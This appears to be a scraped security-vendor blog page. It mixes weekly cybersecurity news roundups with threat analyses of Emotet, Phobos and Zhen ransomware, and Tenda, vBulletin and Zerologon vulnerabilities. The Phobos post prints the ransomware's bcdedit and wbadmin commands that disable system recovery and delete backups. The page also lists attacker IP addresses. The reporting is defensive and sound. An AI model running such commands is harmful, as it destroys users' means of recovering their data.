Posts

Modular Emotet Variant

/in /by

Overview:

SonicWall Capture Labs Threat Research Team recently found a new sample and activity for Emotet. Emotet is an advanced, self-propagating modular malware. Historically, Emotet was a advanced banking malware with botnet capabilities and indicators. Emotet has a variety of install sequences for many different content delivery mechanisms. Mostly Emotet is spread through phishing spam emails containing attachments. The command and control, payloads, and delivery solutions change over time. Emotet first emerged in June of 2014.

Sample, Static Information:

Checking for valid values within the PE File:

Command-line Static Information:

Capabilities, Privilege Escalation and Keylogging stand out here:

Dynamic Information:

WinMain:

Processes Created, Svchost, Calc, MSpaint, and itself twice:

Pipes are used to transfer data:

Network Artifacts:

Injection into mspaint.exe, IP Address: 212.83.168.196

IP Information:

Graph:

Other EXEs that align with this sample:

Supported Systems:

  • Windows 10
  • Windows 8.1
  • Windows 8.0
  • Windows 7
  • Windows Vista

SonicWall, (GAV) Gateway Anti-Virus, provides protection against this threat:

  • GAV: Emotet.N (Trojan)

Appendix:

Sample SHA256 Hash: 5c5267ba9105ed1ebd26d50db8886030a601ffcda46fdbedf85b9a0bdc46e431

Cybersecurity News & Trends – 10-09-20

/0 Comments/in /by

This week, cybercriminals deployed attacks on both U.S. political parties, the shipping industry, and COVID-19 researchers.

SonicWall in the News

Sonicwall Unveils Boundless 2020, Company’s Largest Ever Global Virtual Partner Event — SonicWall Press Release

  • SonicWall unveils Boundless 2020, a three-day virtual partner event hosted online Nov. 17-19. 

Marina Pharmacy Secures Its Branches With SonicWall Next-Gen Firewalls — Intelligent CIO

  • How UAE-based Marina Pharmacy’s SonicWall implementation has improved the group’s security posture and secured network connectivity across its 40 retail stores.

Surge In Ransomware Attacks Threatens Student Data — TechTarget

  • SonicWall CEO Bill Conner explains why K-12 schools are an increasingly attractive target, and why they shouldn’t give in to ransom demands.

Rethinking Cloud Security Amidst Pandemic and Mounting Threats — Digital TechMedia

  • A closer look at how the pandemic has affected cybersecurity in India and around the globe.

Industry News

Cyber Pirates Hit Global Shipping Industry Nearing Peak Season — Bloomberg

  • Two key players in the global shipping industry are trying to restore computer networks and assess the damage from separate cyberattacks just ahead of peak season.

Hackers are using DNC volunteer pitch to deliver malware, researchers warn — The Washington Times

  • Democratic National Committee messaging has been repurposed and weaponized as part of a hacking campaign spotted by cybersecurity researchers following the debate

Ransomware: Gangs are shifting targets and upping their ransom demands — ZDNet

  • Ransomware gangs are getting smarter, factoring in companies’ revenues when determining the ransom they try to collect.

‘Mercenary’ hacker group runs rampant in Middle East, cybersecurity research shows — Reuters

  • Saudi diplomats, Sikh separatists and Indian business executives have been among those targeted by a group of hired hackers.

Phishing emails lure victims with inside info on Trump’s health — Bleeping Computer

  • A phishing campaign pushing a network-compromising backdoor pretends to have the inside scoop on President Trump’s health after being infected with COVID-19.

US warns: Big surge in Emotet malware campaigns makes it one of today’s top threats — ZDNet

  • CISA’s intrusion detection system has recorded 16,000 Emotet threats to government networks since July.

Will We Have Cyberwar or Cyber Peace? — The Wall Street Journal

  • The Wall Street Journal’s Richard Clark takes a look at what cyber warfare could look like in 2030.

Ransomware: Surge in attacks as hackers take advantage of organisations under pressure — ZDNet

  • Cyber criminals are doubling down on ransomware attacks, deploying more sophisticated campaigns at a time when remote working is already creating additional security challenges for businesses

US brokerage firms warned of widespread survey phishing attacks — Bleeping Computer

  • The U.S. Financial Industry Regulatory Authority (FINRA) has issued a notice warning member brokerage firms of widespread phishing attacks using surveys to harvest information.

COVID-19 Clinical Trials Slowed After Ransomware Attack — Threatpost

  • The attack on eResearchTechnology potentially slowed down coronavirus research worldwide, and researchers suggest a nation-state actor could be behind the incident.

In Case You Missed It

Attackers actively targeting Tenda WiFi router vulnerability

/in /by
SonicWall Capture Labs Threat Research team observes attackers actively exploiting the  arbitrary remote code execution vulnerability reported in Tenda AC15 router. Tenda AC15 AC1900AC15 is an AC1900 Smart Dual-band Gigabit Wi-Fi Router designed for smart home networking life.

CVE-2020–10987 | Vulnerability:

The goform/setUsbUnload endpoint of Tenda AC15 AC1900 version 15.03.05.19 allows remote attackers to execute arbitrary system commands via the deviceName parameter. This vulnerability is due to improper validation of the input parameter deviceName and this value is directly passed to a doSystemCmd function, causing an arbitrary command execution.

Exploit:

In the below exploit request that was captured, the attacker passes the malicious shellcode through the deviceName parameter, allowing arbitrary code execution.

This command downloads a reverse shell to the temp directory and executes it

When usb.sh is executed, it downloads more payloads from the attacker server 5.252.194.29 and executes them one by one.

Trend Chart:

IOC:

185.39.11.105
5.252.194.29

SonicWall Capture Labs Threat Research team provides protection against this exploit with the following signatures:

IPS: 13634 Suspicious Request URI 17
IPS: 5811 Web Application Suspicious File Upload 1 -c2
IPS: 3141 Web Application Suspicious File Upload 11
IPS: 15028 Web Application Suspicious File Upload 18

 

Cybersecurity News & Trends – 10-02-20

/0 Comments/in /by

This week, attackers targeted everything from the energy sector and the U.S. elections to social media accounts and your coffeemaker.

SonicWall in the News

The 100 People You Don’t Know but Should 2020 — CRN

  • SonicWall’s Jason Carter has been selected to be part of CRN’s annual “100 People You Don’t Know but Should” list.

How Home Tech Can Be Companies’ Weakest Link — Financial Times (Business Education)

  • SonicWall President and CEO Bill Conner weighs in on how companies can protect against risks due to remote employees’ home network setups.

Managed IT Service Providers Expands Support For Remote Workers During Pandemic — Crain’s Detroit Business

  • In March, SonicWall helped Vision Computer Solutions acquire additional licenses more quickly than normal so the company could rapidly transition to remote work.

These 13 Israeli Cybersecurity Startups Have Raised A collective $847 Million In Funding This Year For New Tools That Protect Remote Work  — Business Insider

  • Perimeter 81 — which SonicWall has invested in — is included in the roundup as a cloud-based company helping IT and security professionals more easily secure remote access.

Industry News

U.S. tech giants face curbs on data sharing, digital marketplaces, under draft EU rules — Reuters

  • Google, Facebook, Amazon, Apple and other U.S. tech giants could be banned from favoring their services or forcing users to sign up to a bundle of services under draft EU rules.

House passes bills to secure energy sector against cyberattacks — The Hill

  • The House has unanimously passed four bills aimed at securing the power grid and other energy infrastructure against cyberattacks.

Microsoft looks to expose espionage groups taking aim at NGOs, US politics — Cyberscoop

  • Cyberscoop summarizes/explores the new Microsoft report — a detailed review of criminal and government hackers’ tradecraft.

When coffee makers are demanding a ransom, you know IoT is screwed — Ars Technica

  • With the name Smarter, you might expect a network-connected kitchen appliance maker to be, well, smarter than companies selling conventional appliances. But in the case of the Smarter’s IoT coffee maker, you’d be wrong.

CISA Warns of Hackers Exploiting Zerologon Vulnerability — Security Week

  • The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an alert to warn of attackers actively targeting a recently addressed vulnerability in the Microsoft Windows Netlogon Remote Protocol (MS-NRPC).

Microsoft disrupts nation-state hacker op using Azure Cloud service — Bleeping Computer

  • In a report today, Microsoft said that it disrupted operations of a nation-state threat group that was using its Azure cloud infrastructure for cyberattacks.

Ransomware Attacks Take On New Urgency Ahead of Vote — The New York Times

  • Attacks against small towns, big cities and the contractors who run their voting systems have federal officials fearing that hackers will try to sow chaos around the election.

FBI director warns that Chinese hackers are still targeting US COVID-19 research — The Hill

  • FBI Director Christopher Wray said Chinese hackers are continuing to target U.S. companies involved in COVID-19 research and described China as the nation’s “greatest counterintelligence threat.”

Mount Locker ransomware joins the multi-million dollar ransom game — Bleeping Computer

  • A new ransomware operation named Mount Locker is stealing victims’ files before encrypting and then demanding multi-million dollar ransoms.

FBI Director: Feeding DOD’s Cyber Offense Operations Is Crucial to New Strategy — Nextgov

  • Senator says legislation is moving forward to thwart intellectual property theft and defend federal networks from cyberattacks.

Phishing attacks are targeting your social network accounts — Bleeping Computer

  • Scammers are targeting your social network accounts with phishing emails that pretend to be copyright violations or promises of a shiny ‘blue checkmark’ next to your name.

In Case You Missed It

Operator of new Phobos variant gives blunt response during negotiation

/in /by

The SonicWall Capture Labs threat research team have observed a new variant from the Phobos ransomware family.  Like Sodinokibi, Phobos is sold on the criminal underground using the ransomware-as-a-service (RaaS) model.  It is spread using various infection methods such as vulnerable Remote Desktop connections and spam email attachments. In the past we have seen Phobos primarily targeting businesses.  However, recently we have also seen several reports of individuals being hit with this malware.  During our analysis of this malware we negotiate ransom payment with the operator.

 

Infection cycle:

 

Upon infection, the following files are dropped onto the system:

  • %APPDATA%\roaming\microsoft\windows\start menu\programs\startup\db_exec.exe [Detected as: GAV: Phobos.RSM_12 (Trojan)]
  • {malware run location}\TempWmicBatchFile.bat
  • {desktop}\info.hta
  • {desktop}\info.txt

 

Files on the system are encrypted and given the following extension:

  • id[94458690-2589].[helpisos@aol.com].isos

 

TempWmicBatchFile.bat contains the following script which, when executed, disables system recovery features:

bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
exit

 

info.hta contains the ransom message and is displayed multiple times on the desktop:

 

info.txt also contains the ransom message:

 

Negotiation:

 

We attempted to reach out to helpisos@aol.com as instructed in the ransom note but were notified by the email server that the address “couldn’t be found, or is unable to receive mail“.  We proceeded to contact @iso_recovery on Telegram and had the following conversation with the operator:

 

Nowadays, ransom fees for individuals are negotiable.  We tried our luck to see how much of a discount is available:

 

We attempted to push further and enlighten the operator about our “dire financial situation” but received the following blunt response:

 

 

 

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Phobos.RSM_12 (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

CVE-2020-17496 – vBulletin RCE vulnerability actively being exploited in the wild

/in /by
SonicWall Capture Labs Threat Research team observes attackers actively exploiting the recent remote code execution vulnerability reported in vBulletin. VBulletin is a popular forum software used by about 20,000 websites. It is written in PHP and uses the MySQL database. 

CVE-2020-17496 | Vulnerability:

A remote code execution vulnerability has been reported in vBulletin. This vulnerability is due to improper validation of subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. It is a bypass for CVE-2019-16759, a critical pre-authentication vulnerability in vBulletin that was disclosed in September 2019. When an attacker sends a crafted ajax request that contains the template name widget_php with malicious code placed in the parameter widgetConfig[‘code’], the render engine will execute the malicious code in the request. It was fixed by checking the name, If the name is widget_php, the engine won’t render the requested template. That made widget_php the only template that could be utilized for PHP code execution. In the latest bypass, the tabbedcontainer_tab_panel template widget is found to be capable of loading “a user-controlled child template, effectively bypassing the patch for CVE-2019-16759.

Exploit:

In the below post request, the child template name is widget_php and the malicious code can be passed through subWidget elements allowing remote code execution.

 

 

A remote, unauthenticated attacker could exploit this vulnerability by sending the above crafted request to the vulnerable server. Successful exploitation could result in remote code execution.

Trend Chart:

SonicWall Capture Labs Threat Research team provides protection against this exploit with the following signatures:

IPS: 15163 vBulletin widget_tabbedContainer_tab_panel Remote Command Execution

Affected Products:

All versions of vBulletin prior to the 5.6.x are affected by this vulnerability. Users should migrate over to a patched version as soon as possible.

Zhen ransomware actively spreading in the wild

/in /by

The SonicWall Capture Labs threat research team observed reports of a new variant family of Zhen ransomware [Zhen.RSM] actively spreading in the wild.

The Zhen ransomware encrypts the victim’s files with a strong encryption algorithm until the victim pays a fee to get them back.

Infection Cycle:

The ransomware adds the following files to the system:

  • Malware.exe
    • %App.path%\ [Name]. < . Zhen >
    • %App.path%\ payment request.txt > recovery instruction

Once the computer is compromised, the ransomware runs the following commands:  (Actual Source code)

When encrypting files it will use the AES encryption algorithm and only encrypt those files that match the following extensions:

The ransomware encrypts all the files and appends the [Zhen] extension onto each encrypted file’s filename.

After encrypting all personal documents, the ransomware shows the following picture containing a message reporting that the computer has been encrypted and to contact its developer for unlock instructions.

We have been monitoring varying hits over the past few days for the signature that blocks this threat:

SonicWall Capture Labs threat research team provides protection against this threat via the following signatures:

  • GAV: ZHEN.RSM (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Cybersecurity News & Trends – 09-25-20

/0 Comments/in /by

This week, foreign hackers made headlines for targeting everything from COVID-19 research, to NASA, to the U.S. presidential election.

SonicWall in the News

Top 5 CyberSecurity Innovations and Why They’re Drawing In The Money — TechGenix

  • SonicWall’s product with Perimeter 81 was in included in article, as an innovation in the zero-trust sector.

ChannelPro Weekly Podcast: Episode #157 – The New M&A (Mongrels & Animals) — ChannelPro Weekly

  • In its weekly news podcast, ChannelPro Network discussed SonicWall’s 7th generation of security products.

Coronavirus Puts Security At The Heart Of The Agenda — MicroScope

  • Terry Greer-King, vice-president for EMEA at SonicWall, says the “mass shift” from working within the corporate perimeter to working from home has made everyone inherently less secure, ushering in an era of “boundless cyber security”

Making Work-From-Home Security Work — ChannelPro Network

  • In an article about how to successfully and securely work from home, SonicWall’s data on the increase in ransomware from the midyear update to the 2020 Cyber Threat Report is included to showcase the dangers of ransomware attacks.

Industry News

U.S. warns ‘foreign actors’ aim to sow doubts over mail-in voting — Reuters

  • U.S. federal law enforcement and cybersecurity agencies on Tuesday warned that “foreign actors” will likely try to discredit the November presidential election by taking advantage of the slow counting of mail-in ballots.

UK Govt Advisor Warns: Universities the Latest Frontier for Cybercriminals — IT Supply Chain

  • Students’ return to universities has coincided with a spate of attacks against academic institutions across the North of England, prompting the National Cyber Security Centre to issue a warning: Prepare for disruption as the term starts.

FBI Open China-Related Counterintelligence Case Every 10 Hours — SC Media

  • FBI Director Christopher Wray offered the House Homeland Security Committee some sobering news about China: the FBI opens a new China-related counterintelligence case roughly every 10 hours.

Ransomware gang targets Russian businesses in rare coordinated attacks — ZDNet

  • Group breaks an unofficial rule in the cybercrime underground not to target the former Soviet space.

Lessons from the ransomware death: Prioritize cyber emergency preparedness — SC Magazine

  • The death of a woman, at least in part due to a ransomware attack, has placed security teams on high alert.

“LokiBot,” the malware that steals your most sensitive data, is on the rise — Ars Technica

  • Officials are seeing a big uptick in infections coming from LokiBot, an open-source DIY malware package that’s openly sold or traded in underground forums. It steals passwords and cryptocurrency wallets, and can also download and install new malware.

The dark web won’t hide you anymore, police warn crooks — ZDNet

  • ‘Operation Disruptor’ involved agencies from nine countries and resulted in the seizure of over $6.5m in cash and cryptocurrencies, as criminals are warned law enforcement will track them down.

Healthcare lags behind in critical vulnerability management, banks hold their ground — ZDNet

  • New research sheds light on which industries are performing well when it comes to patching high-risk bugs.

Officials say NASA facing increased targeting by foreign and domestic hackers — The Hill

  • Top officials at NASA say the agency is facing increasing attempts by foreign hackers to target sensitive information as it works to improve its IT security during the COVID-19 pandemic.

FBI sounds alarm on rampant personal-data theft by China-backed hackers — The Washington Times

  • China is engaged in massive data mining in the U.S. and likely has stolen personal information on nearly half of the entire U.S. population, FBI Director Christopher Wray revealed.

Chinese and Russian hackers pose ‘very, very real threat’ to COVID-19 research: FBI Director Wray — The Washington Times

  • Foreign hackers searching for ways to steal coronavirus research remain a “very, very real cyber threat,” FBI Director Christopher A. Wray told the House Homeland Security Committee.

U.K. warns of surge in ransomware threats against education sector — Bleeping Computer

  • The U.K. National Cyber Security Centre has issued an alert about a surge in ransomware targeting educational institutions, urging them to follow new recommendations for mitigating attacks.

In Case You Missed It

Cybersecurity News & Trends – 09-18-20

/0 Comments/in /by

Between legislation to protect government IoT devices, developments in the TikTok saga and Supreme Court arguments, what’s happening at the federal level this week could have far-reaching implications for cybersecurity.

SonicWall in the News

Politics in the Technology World Order — Verdict Magazine
SonicWall President and CEO Bill Conner weighs in on the future of the U.S. data privacy landscape.

Perimeter 81 Looks To Take Firewall Appliances Out — Security Boulevard
SonicWall, an investor in Perimeter 81’s recent funding round, has partnered with the firm on its firewall-as-a-service software.

Sectigo to Be Acquired by GI Partners — Sectigo Press Release
In a comment about the acquisition, SonicWall President, CEO and Sectigo Board Chairman Bill Conner said, “The future is bright for Sectigo as the company builds on its impressive position as a digital identity and web security solutions leader.”

Industry News

This security awareness training email is actually a phishing scam — Bleeping Computer
A creative phishing campaign spoofs a well-known security company in an email pretending to be a reminder to complete security awareness training.

Oracle-TikTok Deal to Undergo U.S. Security Review — The Wall Street Journal
The Treasury Department said it would review an agreement for Oracle and others to revamp TikTok’s U.S. operations, with the aim of avoiding a ban of the popular video-sharing app.

House approves bill to secure internet-connected federal devices against cyber threats — The Hill
The Internet of Things (IoT) Cybersecurity Improvement Act, passed unanimously by the House, would require all internet-connected devices purchased by the federal government to comply with minimum security recommendations.

Hackers are getting more hands-on with their attacks. That’s not a good sign — ZDNet
Both nation-state-backed hackers and cybercriminals are trying to take advantage of the rise in remote working — and getting more sophisticated in their approach.

LockBit ransomware launches data leak site to double-extort victims — Bleeping Computer
The LockBit ransomware gang has launched a new data leak site to be used as part of their double extortion strategy to scare victims into paying a ransom.

Zerologon attack lets hackers take over enterprise networks — ZDNet
If you’re managing enterprise Windows servers, don’t skip on the August 2020 Patch.

Security researchers slam Voatz brief to the Supreme Court on anti-hacking law — Cyberscoop
The Supreme Court is about to take up a case with major implications for computer research — and a group of high-profile cybersecurity specialists doesn’t want mobile voting firm Voatz to have the last word.

Don’t pay the ransom, mate. Don’t even fix a price, say Australia’s cyber security bods — The Register
Over the past 12 months, the Australian Cyber Security Centre has observed real-world impacts of ransomware incidents, which have typically originated from a user executing a file received as part of a spearphishing campaign.

Russian Intelligence Hackers Are Back, Microsoft Warns, Aiming at Officials of Both Parties — The New York Times
China is also growing more adept at targeting campaign workers, with Beijing mostly aiming at Biden campaign officials.

Iran Says US Vote Hack Allegation ‘Absurd’ — Security Week
Tehran on Friday hit back at allegations by Microsoft that Iran-based hackers had targeted the U.S. presidential campaigns.

Treasury Dept. sanctions Russian, Ukrainian individuals for election interference — The Hill
The Treasury Department has added four Russian and Ukrainian individuals to its specially designated nationals list, citing attempts by the individuals to interfere in U.S. elections.

In Case You Missed It

Windows Netlogon Elevation of Privilege Vulnerability CVE-2020-1472

/in /by

An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC). An attacker who successfully exploited the vulnerability could run a specially crafted application on a network device.
This vulnerability also called Zerologon has a CVSS score of 10.

Netlogon Remote Protocol

The Netlogon Remote Protocol is used for secure communication between machines in a domain and domain controllers (DCs) The communication is secured by using a shared session key computed between the client and the DC that is engaged in the secure communication. The session key is computed by using a preconfigured shared secret that is known to the client and the DC. The Microsoft Windows Netlogon Remote Protocol (MS-NRPC) is a core authentication component of Active Directory that provides authentication for user and computer accounts.

Vulnerability (CVE-2020-1472)

The vulnerability arises from a flaw in the cryptographic implementation of the Netlogon protocol, specifically in its usage of AES-CFB8 encryption. MS-NRPC uses an initialization vector (IV) of 0 (zero) in AES-CFB8 mode when authenticating computer accounts.Due to incorrect use of an AES mode of operation it is possible to spoof the identity of any computer account (including that of the DC itself) and set an empty password for that account in the domain.

The successful exploitation of the vulnerability will allow an attacker to

  • Impersonate any computer on the network,
  • Disable security features that protect the Netlogon process
  • Change a computer’s password associated with its Active Directory account.

Affected products

  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
  • Windows Server 2012
  • Windows Server 2012 (Server Core installation)
  • Windows Server 2012 R2
  • Windows Server 2012 R2 (Server Core installation)
  • Windows Server 2016
  • Windows Server 2016 (Server Core installation)
  • Windows Server 2019
  • Windows Server 2019 (Server Core installation)
  • Windows Server, version 1903 (Server Core installation)
  • Windows Server, version 1909 (Server Core installation)
  • Windows Server, version 2004 (Server Core installation)

Microsoft has patched this vulnerability and is urging to prioritize patching Domain Controllers, as this is likely the primary target.

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • IPS 15143:Windows Netlogon Elevation of Privilege Vulnerability (CVE-2020-1472)1
  • IPS 15156:Windows Netlogon Elevation of Privilege Vulnerability (CVE-2020-1472) 2
  • IPS 15158:Windows Netlogon Elevation of Privilege Vulnerability (CVE-2020-1472) 3